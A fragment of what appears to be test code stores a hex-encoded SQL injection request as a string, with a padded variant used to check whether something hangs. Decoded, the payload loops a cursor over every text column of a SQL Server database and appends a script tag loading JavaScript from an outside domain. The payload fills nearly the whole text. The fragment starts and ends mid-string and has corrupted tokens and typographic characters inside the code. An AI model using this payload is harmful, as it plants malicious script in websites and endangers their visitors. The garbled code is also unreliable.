//0424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404
//32B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263
//3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736372697074
//3E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2
//F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782
//E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542
//046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4
//F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4375727
//36F72%20AS%20AHAR(4000));QXEC(QS);”;

// Does not hang, despite being same length as original, with only the
// CAST(…) contents changed.
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444444444444444444444444444444444444
//4444444444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);”;

String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C
//415245204054207661726368617228323535292C40432076617263686172283
//430303029204445434C415245205461626C655F437572736F7220435552534F
//5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D
//207379736F626A6563747320612C737973636F6C756D6E7320622077686572
//6520612E69643D622E696420616E6420612E78747970653D27752720616E642
//028622E78747970653D3939206F7220622E78747970653D3335206F7220622E
//78747970653D323331206F7220622E78747970653D31363729204F50454E205
//4